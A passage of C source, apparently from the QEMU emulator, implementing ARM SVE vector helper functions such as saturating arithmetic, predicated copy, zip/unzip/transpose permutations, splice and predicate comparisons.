desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 4; uint32_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; i += 1) { uint32_t nn = n[i]; uint32_t mm = m[i]; if (mm & 1) { nn = float32_one; } d[i] = nn ^ (mm & 2) << 30; } } void HELPER(sve_ftssel_d)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; i += 1) { uint64_t nn = n[i]; uint64_t mm = m[i]; if (mm & 1) { nn = float64_one; } d[i] = nn ^ (mm & 2) << 62; } } /* * Signed saturating addition with scalar operand. */ void HELPER(sve_sqaddi_b)(void *d, void *a, int32_t b, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); for (i = 0; i < oprsz; i += sizeof(int8_t)) { int r = *(int8_t *)((char *)a + i) + b; if (r > INT8_MAX) { r = INT8_MAX; } else if (r < INT8_MIN) { r = INT8_MIN; } *(int8_t *)((char *)d + i) = r; } } void HELPER(sve_sqaddi_h)(void *d, void *a, int32_t b, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); for (i = 0; i < oprsz; i += sizeof(int16_t)) { int r = *(int16_t *)((char *)a + i) + b; if (r > INT16_MAX) { r = INT16_MAX; } else if (r < INT16_MIN) { r = INT16_MIN; } *(int16_t *)((char *)d + i) = r; } } void HELPER(sve_sqaddi_s)(void *d, void *a, int64_t b, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); for (i = 0; i < oprsz; i += sizeof(int32_t)) { int64_t r = *(int32_t *)((char *)a + i) + b; if (r > INT32_MAX) { r = INT32_MAX; } else if (r < INT32_MIN) { r = INT32_MIN; } *(int32_t *)((char *)d + i) = r; } } void HELPER(sve_sqaddi_d)(void *d, void *a, int64_t b, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); for (i = 0; i < oprsz; i += sizeof(int64_t)) { int64_t ai = *(int64_t *)((char *)a + i); int64_t r = ai + b; if (((r ^ ai) & ~(ai ^ b)) < 0) { /* Signed overflow. */ r = (r < 0 ? INT64_MAX : INT64_MIN); } *(int64_t *)((char *)d + i) = r; } } /* * Unsigned saturating addition with scalar operand. */ void HELPER(sve_uqaddi_b)(void *d, void *a, int32_t b, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); for (i = 0; i < oprsz; i += sizeof(uint8_t)) { int r = *(uint8_t *)((char *)a + i) + b; if (r > UINT8_MAX) { r = UINT8_MAX; } else if (r < 0) { r = 0; } *(uint8_t *)((char *)d + i) = r; } } void HELPER(sve_uqaddi_h)(void *d, void *a, int32_t b, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); for (i = 0; i < oprsz; i += sizeof(uint16_t)) { int r = *(uint16_t *)((char *)a + i) + b; if (r > UINT16_MAX) { r = UINT16_MAX; } else if (r < 0) { r = 0; } *(uint16_t *)((char *)d + i) = r; } } void HELPER(sve_uqaddi_s)(void *d, void *a, int64_t b, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); for (i = 0; i < oprsz; i += sizeof(uint32_t)) { int64_t r = *(uint32_t *)((char *)a + i) + b; if (r > UINT32_MAX) { r = UINT32_MAX; } else if (r < 0) { r = 0; } *(uint32_t *)((char *)d + i) = r; } } void HELPER(sve_uqaddi_d)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); for (i = 0; i < oprsz; i += sizeof(uint64_t)) { uint64_t r = *(uint64_t *)((char *)a + i) + b; if (r < b) { r = UINT64_MAX; } *(uint64_t *)((char *)d + i) = r; } } void HELPER(sve_uqsubi_d)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); for (i = 0; i < oprsz; i += sizeof(uint64_t)) { uint64_t ai = *(uint64_t *)((char *)a + i); *(uint64_t *)((char *)d + i) = (ai < b ? 0 : ai - b); } } /* Two operand predicated copy immediate with merge. All valid immediates * can fit within 17 signed bits in the simd_data field. */ void HELPER(sve_cpy_m_b)(void *vd, void *vn, void *vg, uint64_t mm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn; uint8_t *pg = vg; mm = dup_const(MO_8, mm); for (i = 0; i < opr_sz; i += 1) { uint64_t nn = n[i]; uint64_t pp = expand_pred_b(pg[H1(i)]); d[i] = (mm & pp) | (nn & ~pp); } } void HELPER(sve_cpy_m_h)(void *vd, void *vn, void *vg, uint64_t mm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn; uint8_t *pg = vg; mm = dup_const(MO_16, mm); for (i = 0; i < opr_sz; i += 1) { uint64_t nn = n[i]; uint64_t pp = expand_pred_h(pg[H1(i)]); d[i] = (mm & pp) | (nn & ~pp); } } void HELPER(sve_cpy_m_s)(void *vd, void *vn, void *vg, uint64_t mm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn; uint8_t *pg = vg; mm = dup_const(MO_32, mm); for (i = 0; i < opr_sz; i += 1) { uint64_t nn = n[i]; uint64_t pp = expand_pred_s(pg[H1(i)]); d[i] = (mm & pp) | (nn & ~pp); } } void HELPER(sve_cpy_m_d)(void *vd, void *vn, void *vg, uint64_t mm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { uint64_t nn = n[i]; d[i] = (pg[H1(i)] & 1 ? mm : nn); } } void HELPER(sve_cpy_z_b)(void *vd, void *vg, uint64_t val, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd; uint8_t *pg = vg; val = dup_const(MO_8, val); for (i = 0; i < opr_sz; i += 1) { d[i] = val & expand_pred_b(pg[H1(i)]); } } void HELPER(sve_cpy_z_h)(void *vd, void *vg, uint64_t val, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd; uint8_t *pg = vg; val = dup_const(MO_16, val); for (i = 0; i < opr_sz; i += 1) { d[i] = val & expand_pred_h(pg[H1(i)]); } } void HELPER(sve_cpy_z_s)(void *vd, void *vg, uint64_t val, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd; uint8_t *pg = vg; val = dup_const(MO_32, val); for (i = 0; i < opr_sz; i += 1) { d[i] = val & expand_pred_s(pg[H1(i)]); } } void HELPER(sve_cpy_z_d)(void *vd, void *vg, uint64_t val, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { d[i] = (pg[H1(i)] & 1 ? val : 0); } } /* Big-endian hosts need to frob the byte indicies. If the copy * happens to be 8-byte aligned, then no frobbing necessary. */ static void swap_memmove(void *vd, void *vs, size_t n) { uintptr_t d = (uintptr_t)vd; uintptr_t s = (uintptr_t)vs; uintptr_t o = (d | s | n) & 7; size_t i; #ifndef HOST_WORDS_BIGENDIAN o = 0; #endif switch (o) { case 0: memmove(vd, vs, n); break; case 4: if (d < s || d >= s + n) { for (i = 0; i < n; i += 4) { *(uint32_t *)H1_4(d + i) = *(uint32_t *)H1_4(s + i); } } else { for (i = n; i > 0; ) { i -= 4; *(uint32_t *)H1_4(d + i) = *(uint32_t *)H1_4(s + i); } } break; case 2: case 6: if (d < s || d >= s + n) { for (i = 0; i < n; i += 2) { *(uint16_t *)H1_2(d + i) = *(uint16_t *)H1_2(s + i); } } else { for (i = n; i > 0; ) { i -= 2; *(uint16_t *)H1_2(d + i) = *(uint16_t *)H1_2(s + i); } } break; default: if (d < s || d >= s + n) { for (i = 0; i < n; i++) { *(uint8_t *)H1(d + i) = *(uint8_t *)H1(s + i); } } else { for (i = n; i > 0; ) { i -= 1; *(uint8_t *)H1(d + i) = *(uint8_t *)H1(s + i); } } break; } } /* Similarly for memset of 0. */ static void swap_memzero(void *vd, size_t n) { uintptr_t d = (uintptr_t)vd; uintptr_t o = (d | n) & 7; size_t i; /* Usually, the first bit of a predicate is set, so N is 0. */ if (likely(n == 0)) { return; } #ifndef HOST_WORDS_BIGENDIAN o = 0; #endif switch (o) { case 0: memset(vd, 0, n); break; case 4: for (i = 0; i < n; i += 4) { *(uint32_t *)H1_4(d + i) = 0; } break; case 2: case 6: for (i = 0; i < n; i += 2) { *(uint16_t *)H1_2(d + i) = 0; } break; default: for (i = 0; i < n; i++) { *(uint8_t *)H1(d + i) = 0; } break; } } void HELPER(sve_ext)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t opr_sz = simd_oprsz(desc); size_t n_ofs = simd_data(desc); size_t n_siz = opr_sz - n_ofs; if (vd != vm) { swap_memmove(vd, (char *)vn + n_ofs, n_siz); swap_memmove((char *)vd + n_siz, vm, n_ofs); } else if (vd != vn) { swap_memmove((char *)vd + n_siz, vd, n_ofs); swap_memmove(vd, (char *)vn + n_ofs, n_siz); } else { /* vd == vn == vm. Need temp space. */ ARMVectorReg tmp; swap_memmove(&tmp, vm, n_ofs); swap_memmove(vd, (char *)vd + n_ofs, n_siz); memcpy((char *)vd + n_siz, &tmp, n_ofs); } } #define DO_INSR(NAME, TYPE, H) \ void HELPER(NAME)(void *vd, void *vn, uint64_t val, uint32_t desc) \ { \ intptr_t opr_sz = simd_oprsz(desc); \ swap_memmove((char *)vd + sizeof(TYPE), vn, opr_sz - sizeof(TYPE)); \ *(TYPE *)((char *)vd + H(0)) = val; \ } DO_INSR(sve_insr_b, uint8_t, H1) DO_INSR(sve_insr_h, uint16_t, H1_2) DO_INSR(sve_insr_s, uint32_t, H1_4) DO_INSR(sve_insr_d, uint64_t, ) #undef DO_INSR void HELPER(sve_rev_b)(void *vd, void *vn, uint32_t desc) { intptr_t i, j, opr_sz = simd_oprsz(desc); for (i = 0, j = opr_sz - 8; i < opr_sz / 2; i += 8, j -= 8) { uint64_t f = *(uint64_t *)((char *)vn + i); uint64_t b = *(uint64_t *)((char *)vn + j); *(uint64_t *)((char *)vd + i) = bswap64(b); *(uint64_t *)((char *)vd + j) = bswap64(f); } } void HELPER(sve_rev_h)(void *vd, void *vn, uint32_t desc) { intptr_t i, j, opr_sz = simd_oprsz(desc); for (i = 0, j = opr_sz - 8; i < opr_sz / 2; i += 8, j -= 8) { uint64_t f = *(uint64_t *)((char *)vn + i); uint64_t b = *(uint64_t *)((char *)vn + j); *(uint64_t *)((char *)vd + i) = hswap64(b); *(uint64_t *)((char *)vd + j) = hswap64(f); } } void HELPER(sve_rev_s)(void *vd, void *vn, uint32_t desc) { intptr_t i, j, opr_sz = simd_oprsz(desc); for (i = 0, j = opr_sz - 8; i < opr_sz / 2; i += 8, j -= 8) { uint64_t f = *(uint64_t *)((char *)vn + i); uint64_t b = *(uint64_t *)((char *)vn + j); *(uint64_t *)((char *)vd + i) = rol64(b, 32); *(uint64_t *)((char *)vd + j) = rol64(f, 32); } } void HELPER(sve_rev_d)(void *vd, void *vn, uint32_t desc) { intptr_t i, j, opr_sz = simd_oprsz(desc); for (i = 0, j = opr_sz - 8; i < opr_sz / 2; i += 8, j -= 8) { uint64_t f = *(uint64_t *)((char *)vn + i); uint64_t b = *(uint64_t *)((char *)vn + j); *(uint64_t *)((char *)vd + i) = b; *(uint64_t *)((char *)vd + j) = f; } } #define DO_TBL(NAME, TYPE, H) \ void HELPER(NAME)(void *vd, void *vn, void *vm, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc); \ uintptr_t elem = opr_sz / sizeof(TYPE); \ TYPE *d = vd, *n = vn, *m = vm; \ ARMVectorReg tmp; \ if (unlikely(vd == vn)) { \ n = memcpy(&tmp, vn, opr_sz); \ } \ for (i = 0; i < elem; i++) { \ TYPE j = m[H(i)]; \ d[H(i)] = j < elem ? n[H(j)] : 0; \ } \ } DO_TBL(sve_tbl_b, uint8_t, H1) DO_TBL(sve_tbl_h, uint16_t, H2) DO_TBL(sve_tbl_s, uint32_t, H4) DO_TBL(sve_tbl_d, uint64_t, ) #undef TBL #define DO_UNPK(NAME, TYPED, TYPES, HD, HS) \ void HELPER(NAME)(void *vd, void *vn, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc); \ TYPED *d = vd; \ TYPES *n = vn; \ ARMVectorReg tmp; \ if (unlikely((char *)vn - (char *)vd < opr_sz)) { \ n = memcpy(&tmp, n, opr_sz / 2); \ } \ for (i = 0; i < opr_sz / sizeof(TYPED); i++) { \ d[HD(i)] = n[HS(i)]; \ } \ } DO_UNPK(sve_sunpk_h, int16_t, int8_t, H2, H1) DO_UNPK(sve_sunpk_s, int32_t, int16_t, H4, H2) DO_UNPK(sve_sunpk_d, int64_t, int32_t, , H4) DO_UNPK(sve_uunpk_h, uint16_t, uint8_t, H2, H1) DO_UNPK(sve_uunpk_s, uint32_t, uint16_t, H4, H2) DO_UNPK(sve_uunpk_d, uint64_t, uint32_t, , H4) #undef DO_UNPK /* Mask of bits included in the even numbered predicates of width esz. * We also use this for expand_bits/compress_bits, and so extend the * same pattern out to 16-bit units. */ static const uint64_t even_bit_esz_masks[5] = { 0x5555555555555555ull, 0x3333333333333333ull, 0x0f0f0f0f0f0f0f0full, 0x00ff00ff00ff00ffull, 0x0000ffff0000ffffull, }; /* Zero-extend units of 2**N bits to units of 2**(N+1) bits. * For N==0, this corresponds to the operation that in qemu/bitops.h * we call half_shuffle64; this algorithm is from Hacker's Delight, * section 7-2 Shuffling Bits. */ static uint64_t expand_bits(uint64_t x, int n) { int i; x &= 0xffffffffu; for (i = 4; i >= n; i--) { int sh = 1 << i; x = ((x << sh) | x) & even_bit_esz_masks[i]; } return x; } /* Compress units of 2**(N+1) bits to units of 2**N bits. * For N==0, this corresponds to the operation that in qemu/bitops.h * we call half_unshuffle64; this algorithm is from Hacker's Delight, * section 7-2 Shuffling Bits, where it is called an inverse half shuffle. */ static uint64_t compress_bits(uint64_t x, int n) { int i; for (i = n; i <= 4; i++) { int sh = 1 << i; x &= even_bit_esz_masks[i]; x = (x >> sh) | x; } return x & 0xffffffffu; } void HELPER(sve_zip_p)(void *vd, void *vn, void *vm, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; int esz = extract32(pred_desc, SIMD_DATA_SHIFT, 2); intptr_t high = extract32(pred_desc, SIMD_DATA_SHIFT + 2, 1); uint64_t *d = vd; intptr_t i; if (oprsz <= 8) { uint64_t nn = *(uint64_t *)vn; uint64_t mm = *(uint64_t *)vm; int half = 4 * oprsz; nn = extract64(nn, high * half, half); mm = extract64(mm, high * half, half); nn = expand_bits(nn, esz); mm = expand_bits(mm, esz); d[0] = nn + (mm << (1 << esz)); } else { ARMPredicateReg tmp_n, tmp_m; /* We produce output faster than we consume input. Therefore we must be mindful of possible overlap. */ if (((char *)vn - (char *)vd) < (uintptr_t)oprsz) { vn = memcpy(&tmp_n, vn, oprsz); } if (((char *)vm - (char *)vd) < (uintptr_t)oprsz) { vm = memcpy(&tmp_m, vm, oprsz); } if (high) { high = oprsz >> 1; } if ((high & 3) == 0) { uint32_t *n = vn, *m = vm; high >>= 2; for (i = 0; i < DIV_ROUND_UP(oprsz, 8); i++) { uint64_t nn = n[H4(high + i)]; uint64_t mm = m[H4(high + i)]; nn = expand_bits(nn, esz); mm = expand_bits(mm, esz); d[i] = nn + (mm << (1 << esz)); } } else { uint8_t *n = vn, *m = vm; uint16_t *d16 = vd; for (i = 0; i < oprsz / 2; i++) { uint16_t nn = n[H1(high + i)]; uint16_t mm = m[H1(high + i)]; nn = expand_bits(nn, esz); mm = expand_bits(mm, esz); d16[H2(i)] = nn + (mm << (1 << esz)); } } } } void HELPER(sve_uzp_p)(void *vd, void *vn, void *vm, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; int esz = extract32(pred_desc, SIMD_DATA_SHIFT, 2); int odd = extract32(pred_desc, SIMD_DATA_SHIFT + 2, 1) << esz; uint64_t *d = vd, *n = vn, *m = vm; uint64_t l, h; intptr_t i; if (oprsz <= 8) { l = compress_bits(n[0] >> odd, esz); h = compress_bits(m[0] >> odd, esz); d[0] = extract64(l + (h << (4 * oprsz)), 0, 8 * oprsz); } else { ARMPredicateReg tmp_m; intptr_t oprsz_16 = oprsz / 16; if (((char *)vm - (char *)vd) < (uintptr_t)oprsz) { m = memcpy(&tmp_m, vm, oprsz); } for (i = 0; i < oprsz_16; i++) { l = n[2 * i + 0]; h = n[2 * i + 1]; l = compress_bits(l >> odd, esz); h = compress_bits(h >> odd, esz); d[i] = l + (h << 32); } /* For VL which is not a power of 2, the results from M do not align nicely with the uint64_t for D. Put the aligned results from M into TMP_M and then copy it into place afterward. */ if (oprsz & 15) { d[i] = compress_bits(n[2 * i] >> odd, esz); for (i = 0; i < oprsz_16; i++) { l = m[2 * i + 0]; h = m[2 * i + 1]; l = compress_bits(l >> odd, esz); h = compress_bits(h >> odd, esz); tmp_m.p[i] = l + (h << 32); } tmp_m.p[i] = compress_bits(m[2 * i] >> odd, esz); swap_memmove((char *)vd + oprsz / 2, &tmp_m, oprsz / 2); } else { for (i = 0; i < oprsz_16; i++) { l = m[2 * i + 0]; h = m[2 * i + 1]; l = compress_bits(l >> odd, esz); h = compress_bits(h >> odd, esz); d[oprsz_16 + i] = l + (h << 32); } } } } void HELPER(sve_trn_p)(void *vd, void *vn, void *vm, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; uintptr_t esz = extract32(pred_desc, SIMD_DATA_SHIFT, 2); bool odd = extract32(pred_desc, SIMD_DATA_SHIFT + 2, 1); uint64_t *d = vd, *n = vn, *m = vm; uint64_t mask; int shr, shl; intptr_t i; shl = 1 << esz; shr = 0; mask = even_bit_esz_masks[esz]; if (odd) { mask <<= shl; shr = shl; shl = 0; } for (i = 0; i < DIV_ROUND_UP(oprsz, 8); i++) { uint64_t nn = (n[i] & mask) >> shr; uint64_t mm = (m[i] & mask) << shl; d[i] = nn + mm; } } /* Reverse units of 2**N bits. */ static uint64_t reverse_bits_64(uint64_t x, int n) { int i, sh; x = bswap64(x); for (i = 2, sh = 4; i >= n; i--, sh >>= 1) { uint64_t mask = even_bit_esz_masks[i]; x = ((x & mask) << sh) | ((x >> sh) & mask); } return x; } static uint8_t reverse_bits_8(uint8_t x, int n) { static const uint8_t mask[3] = { 0x55, 0x33, 0x0f }; int i, sh; for (i = 2, sh = 4; i >= n; i--, sh >>= 1) { x = ((x & mask[i]) << sh) | ((x >> sh) & mask[i]); } return x; } void HELPER(sve_rev_p)(void *vd, void *vn, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; int esz = extract32(pred_desc, SIMD_DATA_SHIFT, 2); intptr_t i, oprsz_2 = oprsz / 2; if (oprsz <= 8) { uint64_t l = *(uint64_t *)vn; l = reverse_bits_64(l << (64 - 8 * oprsz), esz); *(uint64_t *)vd = l; } else if ((oprsz & 15) == 0) { for (i = 0; i < oprsz_2; i += 8) { intptr_t ih = oprsz - 8 - i; uint64_t l = reverse_bits_64(*(uint64_t *)((char *)vn + i), esz); uint64_t h = reverse_bits_64(*(uint64_t *)((char *)vn + ih), esz); *(uint64_t *)((char *)vd + i) = h; *(uint64_t *)((char *)vd + ih) = l; } } else { for (i = 0; i < oprsz_2; i += 1) { intptr_t il = H1(i); intptr_t ih = H1(oprsz - 1 - i); uint8_t l = reverse_bits_8(*(uint8_t *)((char *)vn + il), esz); uint8_t h = reverse_bits_8(*(uint8_t *)((char *)vn + ih), esz); *(uint8_t *)((char *)vd + il) = h; *(uint8_t *)((char *)vd + ih) = l; } } } void HELPER(sve_punpk_p)(void *vd, void *vn, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; intptr_t high = extract32(pred_desc, SIMD_DATA_SHIFT + 2, 1); uint64_t *d = vd; intptr_t i; if (oprsz <= 8) { uint64_t nn = *(uint64_t *)vn; int half = 4 * oprsz; nn = extract64(nn, high * half, half); nn = expand_bits(nn, 0); d[0] = nn; } else { ARMPredicateReg tmp_n; /* We produce output faster than we consume input. Therefore we must be mindful of possible overlap. */ if (((char *)vn - (char *)vd) < (uintptr_t)oprsz) { vn = memcpy(&tmp_n, vn, oprsz); } if (high) { high = oprsz >> 1; } if ((high & 3) == 0) { uint32_t *n = vn; high >>= 2; for (i = 0; i < DIV_ROUND_UP(oprsz, 8); i++) { uint64_t nn = n[H4(high + i)]; d[i] = expand_bits(nn, 0); } } else { uint16_t *d16 = vd; uint8_t *n = vn; for (i = 0; i < oprsz / 2; i++) { uint16_t nn = n[H1(high + i)]; d16[H2(i)] = expand_bits(nn, 0); } } } } #define DO_ZIP(NAME, TYPE, H) \ void HELPER(NAME)(void *vd, void *vn, void *vm, uint32_t desc) \ { \ intptr_t oprsz = simd_oprsz(desc); \ intptr_t i, oprsz_2 = oprsz / 2; \ ARMVectorReg tmp_n, tmp_m; \ /* We produce output faster than we consume input. \ Therefore we must be mindful of possible overlap. */ \ if (unlikely(((char *)vn - (char *)vd) < (uintptr_t)oprsz)) { \ vn = memcpy(&tmp_n, vn, oprsz_2); \ } \ if (unlikely(((char *)vm - (char *)vd) < (uintptr_t)oprsz)) { \ vm = memcpy(&tmp_m, vm, oprsz_2); \ } \ for (i = 0; i < oprsz_2; i += sizeof(TYPE)) { \ *(TYPE *)((char *)vd + H(2 * i + 0)) = *(TYPE *)((char *)vn + H(i)); \ *(TYPE *)((char *)vd + H(2 * i + sizeof(TYPE))) = *(TYPE *)((char *)vm + H(i)); \ } \ } DO_ZIP(sve_zip_b, uint8_t, H1) DO_ZIP(sve_zip_h, uint16_t, H1_2) DO_ZIP(sve_zip_s, uint32_t, H1_4) DO_ZIP(sve_zip_d, uint64_t, ) #define DO_UZP(NAME, TYPE, H) \ void HELPER(NAME)(void *vd, void *vn, void *vm, uint32_t desc) \ { \ intptr_t oprsz = simd_oprsz(desc); \ intptr_t oprsz_2 = oprsz / 2; \ intptr_t odd_ofs = simd_data(desc); \ intptr_t i; \ ARMVectorReg tmp_m; \ if (unlikely(((char *)vm - (char *)vd) < (uintptr_t)oprsz)) { \ vm = memcpy(&tmp_m, vm, oprsz); \ } \ for (i = 0; i < oprsz_2; i += sizeof(TYPE)) { \ *(TYPE *)((char *)vd + H(i)) = *(TYPE *)((char *)vn + H(2 * i + odd_ofs)); \ } \ for (i = 0; i < oprsz_2; i += sizeof(TYPE)) { \ *(TYPE *)((char *)vd + H(oprsz_2 + i)) = *(TYPE *)((char *)vm + H(2 * i + odd_ofs)); \ } \ } DO_UZP(sve_uzp_b, uint8_t, H1) DO_UZP(sve_uzp_h, uint16_t, H1_2) DO_UZP(sve_uzp_s, uint32_t, H1_4) DO_UZP(sve_uzp_d, uint64_t, ) #define DO_TRN(NAME, TYPE, H) \ void HELPER(NAME)(void *vd, void *vn, void *vm, uint32_t desc) \ { \ intptr_t oprsz = simd_oprsz(desc); \ intptr_t odd_ofs = simd_data(desc); \ intptr_t i; \ for (i = 0; i < oprsz; i += 2 * sizeof(TYPE)) { \ TYPE ae = *(TYPE *)((char *)vn + H(i + odd_ofs)); \ TYPE be = *(TYPE *)((char *)vm + H(i + odd_ofs)); \ *(TYPE *)((char *)vd + H(i + 0)) = ae; \ *(TYPE *)((char *)vd + H(i + sizeof(TYPE))) = be; \ } \ } DO_TRN(sve_trn_b, uint8_t, H1) DO_TRN(sve_trn_h, uint16_t, H1_2) DO_TRN(sve_trn_s, uint32_t, H1_4) DO_TRN(sve_trn_d, uint64_t, ) #undef DO_ZIP #undef DO_UZP #undef DO_TRN void HELPER(sve_compact_s)(void *vd, void *vn, void *vg, uint32_t desc) { intptr_t i, j, opr_sz = simd_oprsz(desc) / 4; uint32_t *d = vd, *n = vn; uint8_t *pg = vg; for (i = j = 0; i < opr_sz; i++) { if (pg[H1(i / 2)] & (i & 1 ? 0x10 : 0x01)) { d[H4(j)] = n[H4(i)]; j++; } } for (; j < opr_sz; j++) { d[H4(j)] = 0; } } void HELPER(sve_compact_d)(void *vd, void *vn, void *vg, uint32_t desc) { intptr_t i, j, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn; uint8_t *pg = vg; for (i = j = 0; i < opr_sz; i++) { if (pg[H1(i)] & 1) { d[j] = n[i]; j++; } } for (; j < opr_sz; j++) { d[j] = 0; } } /* Similar to the ARM LastActiveElement pseudocode function, except the * result is multiplied by the element size. This includes the not found * indication; e.g. not found for esz=3 is -8. */ int32_t HELPER(sve_last_active_element)(void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; intptr_t esz = extract32(pred_desc, SIMD_DATA_SHIFT, 2); return last_active_element(vg, DIV_ROUND_UP(oprsz, 8), esz); } void HELPER(sve_splice)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) { intptr_t opr_sz = simd_oprsz(desc) / 8; int esz = simd_data(desc); uint64_t pg, first_g, last_g, len, mask = pred_esz_masks[esz]; intptr_t i, first_i, last_i; ARMVectorReg tmp; first_i = last_i = 0; first_g = last_g = 0; /* Find the extent of the active elements within VG. */ for (i = QEMU_ALIGN_UP(opr_sz, 8) - 8; i >= 0; i -= 8) { pg = *(uint64_t *)((char *)vg + i) & mask; if (pg) { if (last_g == 0) { last_g = pg; last_i = i; } first_g = pg; first_i = i; } } len = 0; if (first_g != 0) { first_i = first_i * 8 + ctz64(first_g); last_i = last_i * 8 + 63 - clz64(last_g); len = last_i - first_i + (1ULL << esz); if (vd == vm) { vm = memcpy(&tmp, vm, opr_sz * 8); } swap_memmove(vd, (char *)vn + first_i, len); } swap_memmove((char *)vd + len, vm, opr_sz * 8 - len); } void HELPER(sve_sel_zpzz_b)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn, *m = vm; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { uint64_t nn = n[i], mm = m[i]; uint64_t pp = expand_pred_b(pg[H1(i)]); d[i] = (nn & pp) | (mm & ~pp); } } void HELPER(sve_sel_zpzz_h)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn, *m = vm; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { uint64_t nn = n[i], mm = m[i]; uint64_t pp = expand_pred_h(pg[H1(i)]); d[i] = (nn & pp) | (mm & ~pp); } } void HELPER(sve_sel_zpzz_s)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn, *m = vm; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { uint64_t nn = n[i], mm = m[i]; uint64_t pp = expand_pred_s(pg[H1(i)]); d[i] = (nn & pp) | (mm & ~pp); } } void HELPER(sve_sel_zpzz_d)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn, *m = vm; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { uint64_t nn = n[i], mm = m[i]; d[i] = (pg[H1(i)] & 1 ? nn : mm); } } /* Two operand comparison controlled by a predicate. * ??? It is very tempting to want to be able to expand this inline * with x86 instructions, e.g. * * vcmpeqw zm, zn, %ymm0 * vpmovmskb %ymm0, %eax * and $0x5555, %eax * and pg, %eax * * or even aarch64, e.g. * * // mask = 4000 1000 0400 0100 0040 0010 0004 0001 * cmeq v0.8h, zn, zm * and v0.8h, v0.8h, mask * addv h0, v0.8h * and v0.8b, pg * * However, coming up with an abstraction that allows vector inputs and * a scalar output, and also handles the byte-ordering of sub-uint64_t * scalar outputs, is tricky. */ #define DO_CMP_PPZZ(NAME, TYPE, OP, H, MASK) \ uint32_t HELPER(NAME)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) \ { \ intptr_t opr_sz = simd_oprsz(desc); \ uint32_t flags = PREDTEST_INIT; \ intptr_t i = opr_sz; \ do { \ uint64_t out = 0, pg; \ do { \ i -= sizeof(TYPE), out <<= sizeof(TYPE); \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ TYPE mm = *(TYPE *)((char *)vm + H(i)); \ out |= nn OP mm; \ } while (i & 63); \ pg = *(uint64_t *)((char *)vg + (i >> 3)) & MASK; \ out &= pg; \ *(uint64_t *)((char *)vd + (i >> 3)) = out; \ flags = iter_predtest_bwd(out, pg, flags); \ } while (i > 0); \ return flags; \ } #define DO_CMP_PPZZ_B(NAME, TYPE, OP) \ DO_CMP_PPZZ(NAME, TYPE, OP, H1, 0xffffffffffffffffull) #define DO_CMP_PPZZ_H(NAME, TYPE, OP) \ DO_CMP_PPZZ(NAME, TYPE, OP, H1_2, 0x5555555555555555ull) #define DO_CMP_PPZZ_S(NAME, TYPE, OP) \ DO_CMP_PPZZ(NAME, TYPE, OP, H1_4, 0x1111111111111111ull) #define DO_CMP_PPZZ_D(NAME, TYPE, OP) \ DO_CMP_PPZZ(NAME, TYPE, OP, , 0x0101010101010101ull) DO_CMP_PPZZ_B(sve_cmpeq_ppzz_b, uint8_t, ==) DO_CMP_PPZZ_H(sve_cmpeq_ppzz_h, uint16_t, ==) DO_CMP_PPZZ_S(sve_cmpeq_ppzz_s, uint32_t, ==) DO_CMP_PPZZ_D(sve_cmpeq_ppzz_d, uint64_t, ==) 